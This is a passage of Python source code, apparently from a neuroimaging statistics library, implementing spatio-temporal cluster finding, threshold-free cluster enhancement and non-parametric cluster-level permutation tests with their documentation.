# just to find the first instance (to save checking every one):
next_ind = np.argmax(r)
if next_ind == 0:
next_ind = None
clusters.append(s[t_inds])
return clusters
def _reassign(check, clusters, base, num):
"""Helper function to reassign cluster numbers"""
# reconfigure check matrix
check[check == num] = base
# concatenate new values into clusters array
clusters[base - 1] = np.concatenate((clusters[base - 1],
clusters[num - 1]))
clusters[num - 1] = np.array([], dtype=int)
def _get_clusters_st_1step(keepers, neighbors):
"""Directly calculate connectivity based on knowledge that time points are
only connected to adjacent neighbors for data organized as time x space.
This algorithm time increases linearly with the number of time points,
compared to with the square for the standard (graph) algorithm.
This algorithm creates clusters for each time point using a method more
efficient than the standard graph method (but otherwise equivalent), then
combines these clusters across time points in a reasonable way."""
n_src = len(neighbors)
n_times = len(keepers)
# start cluster numbering at 1 for diffing convenience
enum_offset = 1
check = np.zeros((n_times, n_src), dtype=int)
clusters = list()
for ii, k in enumerate(keepers):
c = _get_clusters_spatial(k, neighbors)
for ci, cl in enumerate(c):
check[ii, cl] = ci + enum_offset
enum_offset += len(c)
# give them the correct offsets
c = [cl + ii * n_src for cl in c]
clusters += c
# now that each cluster has been assigned a unique number, combine them
# by going through each time point
for check1, check2, k in zip(check[:-1], check[1:], keepers[:-1]):
# go through each one that needs reassignment
inds = k[check2[k] - check1[k] > 0]
check1_d = check1[inds]
n = check2[inds]
nexts = np.unique(n)
for num in nexts:
prevs = check1_d[n == num]
base = np.min(prevs)
for pr in np.unique(prevs[prevs != base]):
_reassign(check1, clusters, base, pr)
# reassign values
_reassign(check2, clusters, base, num)
# clean up clusters
clusters = [cl for cl in clusters if len(cl) > 0]
return clusters
def _get_clusters_st_multistep(keepers, neighbors, max_step=1):
"""Directly calculate connectivity based on knowledge that time points are
only connected to adjacent neighbors for data organized as time x space.
This algorithm time increases linearly with the number of time points,
compared to with the square for the standard (graph) algorithm."""
n_src = len(neighbors)
n_times = len(keepers)
t_border = list()
t_border.append(0)
for ki, k in enumerate(keepers):
keepers[ki] = k + ki * n_src
t_border.append(t_border[ki] + len(k))
t_border = np.array(t_border)
keepers = np.concatenate(keepers)
v = keepers
t, s = divmod(v, n_src)
r = np.ones(t.shape, dtype=bool)
clusters = list()
next_ind = 0
inds = np.arange(t_border[0], t_border[n_times])
if s.size > 0:
while next_ind is not None:
# put first point in a cluster, adjust remaining
t_inds = [next_ind]
r[next_ind] = False
icount = 1 # count of nodes in the current cluster
# look for significant values at the next time point,
# same sensor, not placed yet, and add those
while icount <= len(t_inds):
ind = t_inds[icount - 1]
selves = inds[t_border[max(t[ind] - max_step, 0)]:
t_border[min(t[ind] + max_step + 1, n_times)]]
selves = selves[r[selves]]
selves = selves[s[ind] == s[selves]]
# look at current time point across other vertices
buddies = inds[t_border[t[ind]]:t_border[t[ind] + 1]]
buddies = buddies[r[buddies]]
buddies = buddies[in1d(s[buddies], neighbors[s[ind]],
assume_unique=True)]
buddies = np.concatenate((selves, buddies))
t_inds += buddies.tolist()
r[buddies] = False
icount += 1
# this is equivalent to np.where(r)[0] for these purposes, but it's
# a little bit faster. Unfortunately there's no way to tell numpy
# just to find the first instance (to save checking every one):
next_ind = np.argmax(r)
if next_ind == 0:
next_ind = None
clusters.append(v[t_inds])
return clusters
def _get_clusters_st(x_in, neighbors, max_step=1):
"""Helper function to choose the most efficient version"""
n_src = len(neighbors)
n_times = x_in.size // n_src
cl_goods = np.where(x_in)[0]
if len(cl_goods) > 0:
keepers = [np.array([], dtype=int)] * n_times
row, col = unravel_index(cl_goods, (n_times, n_src))
if isinstance(row, int):
row = [row]
col = [col]
lims = [0]
else:
order = np.argsort(row)
row = row[order]
col = col[order]
lims = [0] + (np.where(np.diff(row) > 0)[0]
+ 1).tolist() + [len(row)]
for start, end in zip(lims[:-1], lims[1:]):
keepers[row[start]] = np.sort(col[start:end])
if max_step == 1:
return _get_clusters_st_1step(keepers, neighbors)
else:
return _get_clusters_st_multistep(keepers, neighbors,
max_step)
else:
return []
def _get_components(x_in, connectivity, return_list=True):
"""get connected components from a mask and a connectivity matrix"""
try:
from sklearn.utils._csgraph import cs_graph_components
except ImportError:
try:
from scikits.learn.utils._csgraph import cs_graph_components
except ImportError:
try:
from sklearn.utils.sparsetools import connected_components
cs_graph_components = connected_components
except ImportError:
# in theory we might be able to shoehorn this into using
# _get_clusters_spatial if we transform connectivity into
# a neighbor list, and it might end up being faster anyway,
# but for now:
raise ImportError('scikit-learn must be installed')
mask = np.logical_and(x_in[connectivity.row], x_in[connectivity.col])
data = connectivity.data[mask]
row = connectivity.row[mask]
col = connectivity.col[mask]
shape = connectivity.shape
idx = np.where(x_in)[0]
row = np.concatenate((row, idx))
col = np.concatenate((col, idx))
data = np.concatenate((data, np.ones(len(idx), dtype=data.dtype)))
connectivity = sparse.coo_matrix((data, (row, col)), shape=shape)
_, components = cs_graph_components(connectivity)
if return_list:
labels = np.unique(components)
clusters = list()
for l in labels:
c = np.where(components == l)[0]
if np.any(x_in[c]):
clusters.append(c)
# logger.info("-- number of components : %d"
# % np.unique(components).size)
return clusters
else:
return components
def _find_clusters(x, threshold, tail=0, connectivity=None, max_step=1,
include=None, partitions=None, t_power=1, show_info=False):
"""For a given 1d-array (test statistic), find all clusters which
are above/below a certain threshold. Returns a list of 2-tuples.
When doing a two-tailed test (tail == 0), only points with the same
sign will be clustered together.
Parameters
----------
x : 1D array
Data
threshold : float | dict
Where to threshold the statistic. Should be negative for tail == -1,
and positive for tail == 0 or 1. Can also be an dict for
threshold-free cluster enhancement.
tail : -1 | 0 | 1
Type of comparison
connectivity : sparse matrix in COO format, None, or list
Defines connectivity between features. The matrix is assumed to
be symmetric and only the upper triangular half is used.
If connectivity is a list, it is assumed that each entry stores the
indices of the spatial neighbors in a spatio-temporal dataset x.
Default is None, i.e, a regular lattice connectivity.
max_step : int
If connectivity is a list, this defines the maximal number of steps
between vertices along the second dimension (typically time) to be
considered connected.
include : 1D bool array or None
Mask to apply to the data of points to cluster. If None, all points
are used.
partitions : array of int or None
An array (same size as X) of integers indicating which points belong
to each partition.
t_power : float
Power to raise the statistical values (usually t-values) by before
summing (sign will be retained). Note that t_power == 0 will give a
count of nodes in each cluster, t_power == 1 will weight each node by
its statistical score.
show_info : bool
If True, display information about thresholds used (for TFCE). Should
only be done for the standard permutation.
Returns
-------
clusters : list of slices or list of arrays (boolean masks)
We use slices for 1D signals and mask to multidimensional
arrays.
sums: array
Sum of x values in clusters.
"""
if tail not in [-1, 0, 1]:
raise ValueError('invalid tail parameter')
x = np.asanyarray(x)
if not np.isscalar(threshold):
if not isinstance(threshold, dict):
raise TypeError('threshold must be a number, or a dict for '
'threshold-free cluster enhancement')
if not all([key in threshold for key in ['start', 'step']]):
raise KeyError('threshold, if dict, must have at least '
'"start" and "step"')
tfce = True
if tail == -1:
if threshold['start'] > 0:
raise ValueError('threshold["start"] must be <= 0 for '
'tail == -1')
if threshold['step'] >= 0:
raise ValueError('threshold["step"] must be < 0 for '
'tail == -1')
stop = np.min(x)
elif tail == 1:
stop = np.max(x)
else: # tail == 0
stop = np.max(np.abs(x))
thresholds = np.arange(threshold['start'], stop,
threshold['step'], float)
h_power = threshold.get('h_power', 2)
e_power = threshold.get('e_power', 0.5)
if show_info is True:
if len(thresholds) == 0:
txt = ('threshold["start"] (%s) is more extreme than '
'data statistics with most extreme value %s'
% (threshold['start'], stop))
logger.warning(txt)
warnings.warn(txt)
else:
logger.info('Using %d thresholds from %0.2f to %0.2f for TFCE '
'computation (h_power=%0.2f, e_power=%0.2f)'
% (len(thresholds), thresholds[0], thresholds[-1],
h_power, e_power))
scores = np.zeros(x.size)
else:
thresholds = [threshold]
tfce = False
# include all points by default
if include is None:
include = np.ones(x.shape, dtype=bool)
if not np.all(np.diff(thresholds) > 0):
raise RuntimeError('Threshold misconfiguration, must be monotonically'
' increasing')
# set these here just in case thresholds == []
clusters = list()
sums = np.empty(0)
for ti, thresh in enumerate(thresholds):
# these need to be reset on each run
clusters = list()
sums = np.empty(0)
if tail == 0:
x_ins = [np.logical_and(x > thresh, include),
np.logical_and(x < -thresh, include)]
elif tail == -1:
x_ins = [np.logical_and(x < thresh, include)]
else: # tail == 1
x_ins = [np.logical_and(x > thresh, include)]
# loop over tails
for x_in in x_ins:
if np.any(x_in):
out = _find_clusters_1dir_parts(x, x_in, connectivity,
max_step, partitions, t_power)
clusters += out[0]
sums = np.concatenate((sums, out[1]))
if tfce is True:
# the score of each point is the sum of the h^H * e^E for each
# supporting section "rectangle" h x e.
if ti == 0:
h = abs(thresh)
else:
h = abs(thresh - thresholds[ti - 1])
h = h ** h_power
for c in clusters:
# triage based on cluster storage type
if isinstance(c, slice):
len_c = c.stop - c.start
elif isinstance(c, tuple):
len_c = len(c)
elif c.dtype == bool:
len_c = np.sum(c)
else:
len_c = len(c)
scores[c] += h * (len_c ** e_power)
if tfce is True:
# each point gets treated independently
clusters = np.arange(x.size)
if connectivity is None:
if x.ndim == 1:
# slices
clusters = [slice(c, c + 1) for c in clusters]
else:
# boolean masks (raveled)
clusters = [(clusters == ii).ravel()
for ii in range(len(clusters))]
else:
clusters = [np.array([c]) for c in clusters]
sums = scores
return clusters, sums
def _find_clusters_1dir_parts(x, x_in, connectivity, max_step, partitions,
t_power):
"""Deal with partitions, and pass the work to _find_clusters_1dir
"""
if partitions is None:
clusters, sums = _find_clusters_1dir(x, x_in, connectivity, max_step,
t_power)
else:
# cluster each partition separately
clusters = list()
sums = list()
for p in range(np.max(partitions) + 1):
x_i = np.logical_and(x_in, partitions == p)
out = _find_clusters_1dir(x, x_i, connectivity, max_step, t_power)
clusters += out[0]
sums.append(out[1])
sums = np.concatenate(sums)
return clusters, sums
def _find_clusters_1dir(x, x_in, connectivity, max_step, t_power):
"""Actually call the clustering algorithm"""
if connectivity is None:
labels, n_labels = ndimage.label(x_in)
if x.ndim == 1:
# slices
clusters = ndimage.find_objects(labels, n_labels)
if len(clusters) == 0:
sums = list()
else:
index = list(range(1, n_labels + 1))
if t_power == 1:
sums = ndimage.measurements.sum(x, labels, index=index)
else:
sums = ndimage.measurements.sum(np.sign(x) *
np.abs(x) ** t_power,
labels, index=index)
else:
# boolean masks (raveled)
clusters = list()
sums = np.empty(n_labels)
for l in range(1, n_labels + 1):
c = labels == l
clusters.append(c.ravel())
if t_power == 1:
sums[l - 1] = np.sum(x[c])
else:
sums[l - 1] = np.sum(np.sign(x[c]) *
np.abs(x[c]) ** t_power)
else:
if x.ndim > 1:
raise Exception("Data should be 1D when using a connectivity "
"to define clusters.")
if isinstance(connectivity, sparse.spmatrix):
clusters = _get_components(x_in, connectivity)
elif isinstance(connectivity, list): # use temporal adjacency
clusters = _get_clusters_st(x_in, connectivity, max_step)
else:
raise ValueError('Connectivity must be a sparse matrix or list')
if t_power == 1:
sums = np.array([np.sum(x[c]) for c in clusters])
else:
sums = np.array([np.sum(np.sign(x[c]) * np.abs(x[c]) ** t_power)
for c in clusters])
return clusters, np.atleast_1d(sums)
def _cluster_indices_to_mask(components, n_tot):
"""Convert to the old format of clusters, which were bool arrays"""
for ci, c in enumerate(components):
components[ci] = np.zeros((n_tot), dtype=bool)
components[ci][c] = True
return components
def _cluster_mask_to_indices(components):
"""Convert to the old format of clusters, which were bool arrays"""
for ci, c in enumerate(components):
if not isinstance(c, slice):
components[ci] = np.where(c)[0]
return components
def _pval_from_histogram(T, H0, tail):
"""Get p-values from stats values given an H0 distribution
For each stat compute a p-value as percentile of its statistics
within all statistics in surrogate data
"""
if tail not in [-1, 0, 1]:
raise ValueError('invalid tail parameter')
# from pct to fraction
if tail == -1: # up tail
pval = np.array([np.sum(H0 <= t) for t in T])
elif tail == 1: # low tail
pval = np.array([np.sum(H0 >= t) for t in T])
else: # both tails
pval = np.array([np.sum(abs(H0) >= abs(t)) for t in T])
pval = (pval + 1.0) / (H0.size + 1.0) # the init data is one resampling
return pval
def _setup_connectivity(connectivity, n_vertices, n_times):
if connectivity.shape[0] == n_vertices: # use global algorithm
connectivity = connectivity.tocoo()
n_times = None
else: # use temporal adjacency algorithm
if not round(n_vertices / float(connectivity.shape[0])) == n_times:
raise ValueError('connectivity must be of the correct size')
# we claim to only use upper triangular part... not true here
connectivity = (connectivity + connectivity.transpose()).tocsr()
connectivity = [connectivity.indices[connectivity.indptr[i]:
connectivity.indptr[i + 1]] for i in
range(len(connectivity.indptr) - 1)]
return connectivity
def _do_permutations(X_full, slices, threshold, tail, connectivity, stat_fun,
max_step, include, partitions, t_power, seeds,
sample_shape, buffer_size, progress_bar):
n_samp, n_vars = X_full.shape
if buffer_size is not None and n_vars <= buffer_size:
buffer_size = None # don't use buffer for few variables
# allocate space for output
max_cluster_sums = np.empty(len(seeds), dtype=np.double)
if buffer_size is not None:
# allocate buffer, so we don't need to allocate memory during loop
X_buffer = [np.empty((len(X_full[s]), buffer_size), dtype=X_full.dtype)
for s in slices]
for seed_idx, seed in enumerate(seeds):
if progress_bar is not None:
if (not (seed_idx + 1) % 32) or (seed_idx == 0):
progress_bar.update(seed_idx + 1)
# shuffle sample indices
rng = np.random.RandomState(seed)
idx_shuffled = np.arange(n_samp)
rng.shuffle(idx_shuffled)
idx_shuffle_list = [idx_shuffled[s] for s in slices]
if buffer_size is None:
# shuffle all data at once
X_shuffle_list = [X_full[idx, :] for idx in idx_shuffle_list]
T_obs_surr = stat_fun(*X_shuffle_list)
else:
# only shuffle a small data buffer, so we need less memory
T_obs_surr = np.empty(n_vars, dtype=X_full.dtype)
for pos in range(0, n_vars, buffer_size):
# number of variables for this loop
n_var_loop = min(pos + buffer_size, n_vars) - pos
# fill buffer
for i, idx in enumerate(idx_shuffle_list):
X_buffer[i][:, :n_var_loop] =\
X_full[idx, pos: pos + n_var_loop]
# apply stat_fun and store result
tmp = stat_fun(*X_buffer)
T_obs_surr[pos: pos + n_var_loop] = tmp[:n_var_loop]
# The stat should have the same shape as the samples for no conn.
if connectivity is None:
T_obs_surr.shape = sample_shape
# Find cluster on randomized stats
out = _find_clusters(T_obs_surr, threshold=threshold, tail=tail,
max_step=max_step, connectivity=connectivity,
partitions=partitions, include=include,
t_power=t_power)
perm_clusters_sums = out[1]
if len(perm_clusters_sums) > 0:
max_cluster_sums[seed_idx] = np.max(perm_clusters_sums)
else:
max_cluster_sums[seed_idx] = 0
return max_cluster_sums
def _do_1samp_permutations(X, slices, threshold, tail, connectivity, stat_fun,
max_step, include, partitions, t_power, seeds,
sample_shape, buffer_size, progress_bar):
n_samp, n_vars = X.shape
assert slices is None # should be None for the 1 sample case
if buffer_size is not None and n_vars <= buffer_size:
buffer_size = None # don't use buffer for few variables
# allocate space for output
max_cluster_sums = np.empty(len(seeds), dtype=np.double)
if buffer_size is not None:
# allocate a buffer so we don't need to allocate memory in loop
X_flip_buffer = np.empty((n_samp, buffer_size), dtype=X.dtype)
for seed_idx, seed in enumerate(seeds):
if progress_bar is not None:
if not (seed_idx + 1) % 32 or seed_idx == 0:
progress_bar.update(seed_idx + 1)
if isinstance(seed, np.ndarray):
# new surrogate data with specified sign flip
if not seed.size == n_samp:
raise ValueError('rng string must be n_samples long')
signs = 2 * seed[:, None].astype(int) - 1
if not np.all(np.equal(np.abs(signs), 1)):
raise ValueError('signs from rng must be +/- 1')
else:
rng = np.random.RandomState(seed)
# new surrogate data with random sign flip
signs = np.sign(0.5 - rng.rand(n_samp))
signs = signs[:, np.newaxis]
if buffer_size is None:
X *= signs
# Recompute statistic on randomized data
T_obs_surr = stat_fun(X)
# Set X back to previous state (trade memory eff. for CPU use)
X *= signs
else:
# only sign-flip a small data buffer, so we need less memory
T_obs_surr = np.empty(n_vars, dtype=X.dtype)
for pos in range(0, n_vars, buffer_size):
# number of variables for this loop
n_var_loop = min(pos + buffer_size, n_vars) - pos
X_flip_buffer[:, :n_var_loop] =\
signs * X[:, pos: pos + n_var_loop]
# apply stat_fun and store result
tmp = stat_fun(X_flip_buffer)
T_obs_surr[pos: pos + n_var_loop] = tmp[:n_var_loop]
# The stat should have the same shape as the samples for no conn.
if connectivity is None:
T_obs_surr.shape = sample_shape
# Find cluster on randomized stats
out = _find_clusters(T_obs_surr, threshold=threshold, tail=tail,
max_step=max_step, connectivity=connectivity,
partitions=partitions, include=include,
t_power=t_power)
perm_clusters_sums = out[1]
if len(perm_clusters_sums) > 0:
# get max with sign info
idx_max = np.argmax(np.abs(perm_clusters_sums))
max_cluster_sums[seed_idx] = perm_clusters_sums[idx_max]
else:
max_cluster_sums[seed_idx] = 0
return max_cluster_sums
@verbose
def _permutation_cluster_test(X, threshold, n_permutations, tail, stat_fun,
connectivity, verbose, n_jobs, seed, max_step,
exclude, step_down_p, t_power, out_type,
check_disjoint, buffer_size):
n_jobs = check_n_jobs(n_jobs)
""" Aux Function
Note. X is required to be a list. Depending on the length of X
either a 1 sample t-test or an f-test / more sample permutation scheme
is elicited.
"""
if out_type not in ['mask', 'indices']:
raise ValueError('out_type must be either \'mask\' or \'indices\'')
# check dimensions for each group in X (a list at this stage).
X = [x[:, np.newaxis] if x.ndim == 1 else x for x in X]
n_samples = X[0].shape[0]
n_times = X[0].shape[1]
sample_shape = X[0].shape[1:]
for x in X:
if x.shape[1:] != sample_shape:
raise ValueError('All samples mush have the same size')
# flatten the last dimensions in case the data is high dimensional
X = [np.reshape(x, (x.shape[0], -1)) for x in X]
n_tests = X[0].shape[1]
if connectivity is not None:
connectivity = _setup_connectivity(connectivity, n_tests, n_times)
if (exclude is not None) and not exclude.size == n_tests:
raise ValueError('exclude must be the same shape as X[0]')
# Step 1: Calculate T-stat for original data
# -------------------------------------------------------------
T_obs = stat_fun(*X)
logger.info('stat_fun(H1): min=%f max=%f' % (np.min(T_obs), np.max(T_obs)))
# test if stat_fun treats variables independently
if buffer_size is not None:
T_obs_buffer = np.zeros_like(T_obs)
for pos in range(0, n_tests, buffer_size):
T_obs_buffer[pos: pos + buffer_size] =\
stat_fun(*[x[:, pos: pos + buffer_size] for x in X])
if not np.alltrue(T_obs == T_obs_buffer):
logger.warning('Provided stat_fun does not treat variables '
'independently. Setting buffer_size to None.')
buffer_size = None
# The stat should have the same shape as the samples for no conn.
if connectivity is None:
T_obs.shape = sample_shape
if exclude is not None:
include = np.logical_not(exclude)
else:
include = None
# determine if connectivity itself can be separated into disjoint sets
if check_disjoint is True and connectivity is not None:
partitions = _get_partitions_from_connectivity(connectivity, n_times)
else:
partitions = None
logger.info('Running intial clustering')
out = _find_clusters(T_obs, threshold, tail, connectivity,
max_step=max_step, include=include,
partitions=partitions, t_power=t_power,
show_info=True)
clusters, cluster_stats = out
# For TFCE, return the "adjusted" statistic instead of raw scores
if isinstance(threshold, dict):
T_obs = cluster_stats.copy()
logger.info('Found %d clusters' % len(clusters))
# convert clusters to old format
if connectivity is not None:
# our algorithms output lists of indices by default
if out_type == 'mask':
clusters = _cluster_indices_to_mask(clusters, n_tests)
else:
# ndimage outputs slices or boolean masks by default
if out_type == 'indices':
clusters = _cluster_mask_to_indices(clusters)
# The stat should have the same shape as the samples
T_obs.shape = sample_shape
if len(X) == 1: # 1 sample test
do_perm_func = _do_1samp_permutations
X_full = X[0]
slices = None
else:
do_perm_func = _do_permutations
X_full = np.concatenate(X, axis=0)
n_samples_per_condition = [x.shape[0] for x in X]
splits_idx = np.append([0], np.cumsum(n_samples_per_condition))
slices = [slice(splits_idx[k], splits_idx[k + 1])
for k in range(len(X))]
parallel, my_do_perm_func, _ = parallel_func(do_perm_func, n_jobs)
# Step 2: If we have some clusters, repeat process on permuted data
# -------------------------------------------------------------------
def get_progress_bar(seeds):
# make sure the progress bar adds to up 100% across n jobs
return (ProgressBar(len(seeds), spinner=True) if
logger.level <= logging.INFO else None)
if len(clusters) > 0:
# check to see if we can do an exact test
# note for a two-tailed test, we can exploit symmetry to just do half
seeds = None
if len(X) == 1:
max_perms = 2 ** (n_samples - (tail == 0))
if max_perms <= n_permutations:
# omit first perm b/c accounted for in _pval_from_histogram,
# convert to binary array representation
seeds = [np.fromiter(np.binary_repr(s, n_samples), dtype=int)
for s in range(1, max_perms)]
if seeds is None:
if seed is None:
seeds = [None] * n_permutations
else:
seeds = list(seed + np.arange(n_permutations))
# Step 3: repeat permutations for step-down-in-jumps procedure
n_removed = 1 # number of new clusters added
total_removed = 0
step_down_include = None # start out including all points
n_step_downs = 0
while n_removed > 0:
# actually do the clustering for each partition
if include is not None:
if step_down_include is not None:
this_include = np.logical_and(include, step_down_include)
else:
this_include = include
else:
this_include = step_down_include
logger.info('Permuting ...')
H0 = parallel(my_do_perm_func(X_full, slices, threshold, tail,
connectivity, stat_fun, max_step, this_include,
partitions, t_power, s, sample_shape, buffer_size,
get_progress_bar(s))
for s in split_list(seeds, n_jobs))
H0 = np.concatenate(H0)
logger.info('Computing cluster p-values')
cluster_pv = _pval_from_histogram(cluster_stats, H0, tail)
# figure out how many new ones will be removed for step-down
to_remove = np.where(cluster_pv < step_down_p)[0]
n_removed = to_remove.size - total_removed
total_removed = to_remove.size
step_down_include = np.ones(n_tests, dtype=bool)
for ti in to_remove:
step_down_include[clusters[ti]] = False
if connectivity is None:
step_down_include.shape = sample_shape
n_step_downs += 1
if step_down_p > 0:
a_text = 'additional ' if n_step_downs > 1 else ''
pl = '' if n_removed == 1 else 's'
logger.info('Step-down-in-jumps iteration #%i found %i %s'
'cluster%s to exclude from subsequent iterations'
% (n_step_downs, n_removed, a_text, pl))
logger.info('Done.')
# The clusters should have the same shape as the samples
clusters = _reshape_clusters(clusters, sample_shape)
return T_obs, clusters, cluster_pv, H0
else:
return T_obs, np.array([]), np.array([]), np.array([])
def ttest_1samp_no_p(X, sigma=0, method='relative'):
"""t-test with variance adjustment and no p-value calculation
Parameters
----------
X : array
Array to return t-values for.
sigma : float
The variance estate will be given by "var + sigma * max(var)" or
"var + sigma", depending on "method". By default this is 0 (no
adjustment). See Notes for details.
method : str
If 'relative', the minimum variance estimate will be sigma * max(var),
if 'absolute' the minimum variance estimate will be sigma.
Returns
-------
t : array
t-values, potentially adjusted using the hat method.
Notes
-----
One can use the conversion:
threshold = -scipy.stats.distributions.t.ppf(p_thresh, n_samples - 1)
to convert a desired p-value threshold to t-value threshold. Don't forget
that for two-tailed tests, p_thresh in the above should be divided by 2.
To use the "hat" adjustment method, a value of sigma=1e-3 may be a
reasonable choice. See Ridgway et al. 2012 "The problem of low variance
voxels in statistical parametric mapping; a new hat avoids a 'haircut'",
NeuroImage. 2012 Feb 1;59(3):2131-41.
"""
if method not in ['absolute', 'relative']:
raise ValueError('method must be "absolute" or "relative", not %s'
% method)
var = np.var(X, axis=0, ddof=1)
if sigma > 0:
limit = sigma * np.max(var) if method == 'relative' else sigma
var += limit
return np.mean(X, axis=0) / np.sqrt(var / X.shape[0])
@verbose
def permutation_cluster_test(X, threshold=None, n_permutations=1024,
tail=0, stat_fun=f_oneway,
connectivity=None, verbose=None, n_jobs=1,
seed=None, max_step=1, exclude=None,
step_down_p=0, t_power=1, out_type='mask',
check_disjoint=False, buffer_size=1000):
"""Cluster-level statistical permutation test
For a list of nd-arrays of data, e.g. 2d for time series or 3d for
time-frequency power values, calculate some statistics corrected for
multiple comparisons using permutations and cluster level correction.
Each element of the list X contains the data for one group of
observations. Randomized data are generated with random partitions
of the data.
Parameters
----------
X : list
List of nd-arrays containing the data. Each element of X contains
the samples for one group. First dimension of each element is the
number of samples/observations in this group. The other dimensions
are for the size of the observations. For example if X = [X1, X2]
with X1.shape = (20, 50, 4) and X2.shape = (17, 50, 4) one has
2 groups with respectively 20 and 17 observations in each.
Each data point is of shape (50, 4).
threshold : float | dict | None
If threshold is None, it will choose a t-threshold equivalent to
p < 0.05 for the given number of (within-subject) observations.
If a dict is used, then threshold-free cluster enhancement (TFCE)
will be used.
n_permutations : int
The number of permutations to compute.
tail : -1 or 0 or 1 (default = 0)
If tail is 1, the statistic is thresholded above threshold.
If tail is -1, the statistic is thresholded below threshold.
If tail is 0, the statistic is thresholded on both sides of
the distribution.
stat_fun : callable
function called to calculate statistics, must accept 1d-arrays as
arguments (default: scipy.stats.f_oneway).
connectivity : sparse matrix.
Defines connectivity between features. The matrix is assumed to
be symmetric and only the upper triangular half is used.
Default is None, i.e, a regular lattice connectivity.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
n_jobs : int
Number of permutations to run in parallel (requires joblib package).
seed : int or None
Seed the random number generator for results reproducibility.
max_step : int
When connectivity is a n_vertices x n_vertices matrix, specify the
maximum number of steps between vertices along the second dimension
(typically time) to be considered connected. This is not used for full
or None connectivity matrices.
exclude : boolean array or None
Mask to apply to the data to exclude certain points from clustering
(e.g., medial wall vertices). Should be the same shape as X. If None,
no points are excluded.
step_down_p : float
To perform a step-down-in-jumps test, pass a p-value for clusters to
exclude from each successive iteration. Default is zero, perform no
step-down test (since no clusters will be smaller than this value).
Setting this to a reasonable value, e.g. 0.05, can increase sensitivity
but costs computation time.
t_power : float
Power to raise the statistical values (usually f-values) by before
summing (sign will be retained). Note that t_power == 0 will give a
count of nodes in each cluster, t_power == 1 will weight each node by
its statistical score.
out_type : str
For arrays with connectivity, this sets the output format for clusters.
If 'mask', it will pass back a list of boolean mask arrays.
If 'indices', it will pass back a list of lists, where each list is the
set of vertices in a given cluster. Note that the latter may use far
less memory for large datasets.
check_disjoint : bool
If True, the connectivity matrix (or list) will be examined to
determine of it can be separated into disjoint sets. In some cases
(usually with connectivity as a list and many "time" points), this
can lead to faster clustering, but results should be identical.
buffer_size: int or None
The statistics will be computed for blocks of variables of size
"buffer_size" at a time. This is option significantly reduces the
memory requirements when n_jobs > 1 and memory sharing between
processes is enabled (see set_cache_dir()), as X will be shared
between processes and each process only needs to allocate space
for a small block of variables.
Returns
-------
T_obs : array of shape [n_tests]
T-statistic observed for all variables.
clusters : list
List type defined by out_type above.
cluster_pv : array
P-value for each cluster
H0 : array of shape [n_permutations]
Max cluster level stats observed under permutation.
Notes
-----
Reference:
Cluster permutation algorithm as described in
Maris/Oostenveld (2007),
"Nonparametric statistical testing of EEG- and MEG-data"
Journal of Neuroscience Methods, Vol. 164, No. 1., pp. 177-190.
doi:10.1016/j.jneumeth.2007.03.024
"""
if threshold is None:
p_thresh = 0.05 / (1 + (tail == 0))
n_samples_per_group = [len(x) for x in X]
threshold = stats.distributions.f.ppf(1. - p_thresh,
*n_samples_per_group)
if np.sign(tail) < 0:
threshold = -threshold
return _permutation_cluster_test(X=X, threshold=threshold,
n_permutations=n_permutations,
tail=tail, stat_fun=stat_fun,
connectivity=connectivity,
verbose=verbose,
n_jobs=n_jobs, seed=seed,
max_step=max_step,
exclude=exclude, step_down_p=step_down_p,
t_power=t_power, out_type=out_type,
check_disjoint=check_disjoint,
buffer_size=buffer_size)
permutation_cluster_test.__test__ = False
@verbose
def permutation_cluster_1samp_test(X, threshold=None, n_permutations=1024,
tail=0, stat_fun=ttest_1samp_no_p,
connectivity=None, verbose=None, n_jobs=1,
seed=None, max_step=1, exclude=None,
step_down_p=0, t_power=1, out_type='mask',
check_disjoint=False, buffer_size=1000):
"""Non-parametric cluster-level 1 sample T-test
From a array of observations, e.g. signal amplitudes or power spectrum
estimates etc., calculate if the observed mean significantly deviates
from 0. The procedure uses a cluster analysis with permutation test
for calculating corrected p-values. Randomized data are generated with
random sign flips.
Parameters
----------
X : array, shape=(n_samples, p, q) or (n_samples, p)
Array where the first dimension corresponds to the
samples (observations). X[k] can be a 1D or 2D array (time series
or TF image) associated to the kth observation.
threshold : float | dict | None
If threshold is None, it will choose a t-threshold equivalent to
p < 0.05 for the given number of (within-subject) observations.
If a dict is used, then threshold-free cluster enhancement (TFCE)
will be used.
n_permutations : int
The number of permutations to compute.
tail : -1 or 0 or 1 (default = 0)
If tail is 1, the statistic is thresholded above threshold.
If tail is -1, the statistic is thresholded below threshold.
If tail is 0, the statistic is thresholded on both sides of
the distribution.
stat_fun : function
Function used to compute the statistical map.
connectivity : sparse matrix or None
Defines connectivity between features. The matrix is assumed to
be symmetric and only the upper triangular half is used.
This matrix must be square with dimension (n_vertices * n_times) or
(n_vertices). Default is None, i.e, a regular lattice connectivity.
Use square n_vertices matrix for datasets with a large temporal
extent to save on memory and computation time.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
n_jobs : int
Number of permutations to run in parallel (requires joblib package).
seed : int or None
Seed the random number generator for results reproducibility.
Note that if n_permutations >= 2^(n_samples) [or (2^(n_samples-1)) for
two-tailed tests], this value will be ignored since an exact test
(full permutation test) will be performed.
max_step : int
When connectivity is a n_vertices x n_vertices matrix, specify the
maximum number of steps between vertices along the second dimension
(typically time) to be considered connected. This is not used for full
or None connectivity matrices.
exclude : boolean array or None
Mask to apply to the data to exclude certain points from clustering
(e.g., medial wall vertices). Should be the same shape as X. If None,
no points are excluded.
step_down_p : float
To perform a step-down-in-jumps test, pass a p-value for clusters to
exclude from each successive iteration. Default is zero, perform no
step-down test (since no clusters will be smaller than this value).
Setting this to a reasonable value, e.g. 0.05, can increase sensitivity
but costs computation time.
t_power : float
Power to raise the statistical values (usually t-values) by before
summing (sign will be retained). Note that t_power == 0 will give a
count of nodes in each cluster, t_power == 1 will weight each node by
its statistical score.
out_type : str
For arrays with connectivity, this sets the output format for clusters.
If 'mask', it will pass back a list of boolean mask arrays.
If 'indices', it will pass back a list of lists, where each list is the
set of vertices in a given cluster. Note that the latter may use far
less memory for large datasets.
check_disjoint : bool
If True, the connectivity matrix (or list) will be examined to
determine of it can be separated into disjoint sets. In some cases
(usually with connectivity as a list and many "time" points), this
can lead to faster clustering, but results should be identical.
buffer_size: int or None
The statistics will be computed for blocks of variables of size
"buffer_size" at a time. This is option significantly reduces the
memory requirements when n_jobs > 1 and memory sharing between
processes is enabled (see set_cache_dir()), as X will be shared
between processes and each process only needs to allocate space
for a small block of variables.
Returns
-------
